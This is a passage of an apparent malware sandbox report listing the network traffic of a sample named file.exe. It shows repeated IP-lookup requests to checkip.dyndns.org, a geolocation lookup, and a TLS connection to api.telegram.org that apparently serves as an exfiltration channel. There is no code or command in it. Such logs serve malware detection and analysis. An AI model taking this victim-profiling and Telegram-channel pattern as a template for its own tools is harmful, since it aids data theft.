                                                                                                                                                Dec 31, 2024 09:15:30.078500032 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.228188038 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.228241920 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.228295088 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:30.229207993 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:30.232445002 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.232952118 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.237538099 CET8049756193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.237598896 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.237689972 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.237754107 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.237850904 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.242567062 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.332470894 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.333483934 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.333532095 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.333597898 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.333851099 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.333862066 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.381635904 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.792059898 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.793529034 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.793554068 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946696043 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946749926 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946808100 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.947184086 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.950520992 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.951661110 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.955506086 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.955564022 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.956490040 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.956562996 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.956620932 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.961381912 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.092670918 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.098244905 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098300934 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.098385096 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098793030 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098809958 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.147304058 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.570466995 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.581612110 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.581650972 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720375061 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720443010 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720510006 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.725294113 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.728749990 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.729458094 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.733752966 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.733815908 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.734292984 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.734354973 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.734471083 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.739260912 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.361457109 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.364228964 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364288092 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.364360094 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364593029 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364608049 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.412919044 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.818207026 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.819756985 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.819792986 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968435049 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968492985 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968586922 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.969039917 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.984481096 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.989397049 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.991081953 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.992275000 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992352962 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.992432117 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992767096 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992800951 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.658248901 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.658360958 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.660093069 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.660123110 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.660367012 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.661731005 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.703330040 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900489092 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900552988 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900624990 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.904441118 CET49764443192.168.2.4149.154.167.220

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 31, 2024 09:15:01.263828039 CET6274653192.168.2.41.1.1.1
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET53627461.1.1.1192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.966434956 CET6058153192.168.2.41.1.1.1
                                                                                                                                                Dec 31, 2024 09:15:17.973577023 CET53605811.1.1.1192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.984405041 CET5482353192.168.2.41.1.1.1
                                                                                                                                                Dec 31, 2024 09:15:35.991019011 CET53548231.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 31, 2024 09:15:01.263828039 CET192.168.2.41.1.1.10x99b7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:17.966434956 CET192.168.2.41.1.1.10xc2cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:35.984405041 CET192.168.2.41.1.1.10x561aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:01.271559000 CET1.1.1.1192.168.2.40x99b7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:17.973577023 CET1.1.1.1192.168.2.40xc2cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:17.973577023 CET1.1.1.1192.168.2.40xc2cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 31, 2024 09:15:35.991019011 CET1.1.1.1192.168.2.40x561aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • reallyfreegeoip.org
                                                                                                                                                • api.telegram.org
                                                                                                                                                • checkip.dyndns.org

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449732193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:01.294137001 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:17.298800945 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                Dec 31, 2024 09:15:17.303647041 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 31, 2024 09:15:17.930998087 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                Dec 31, 2024 09:15:19.010143042 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                Dec 31, 2024 09:15:19.010385990 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                Dec 31, 2024 09:15:19.010497093 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                Dec 31, 2024 09:15:19.910636902 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 31, 2024 09:15:21.648451090 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:21 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449750193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:22.249711037 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 31, 2024 09:15:24.145787954 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449752193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:24.749233961 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:26.876363993 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:26 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449754193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:27.492362976 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:28.344259977 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:28 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449756193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:28.956366062 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:29.597047091 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:29 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.449758193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:30.237850904 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:31.332470894 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:31 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449760193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:31.956620932 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:33.092670918 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:33 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.449762193.122.6.168807692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 31, 2024 09:15:33.734471083 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2024 09:15:35.361457109 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:35 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449748188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
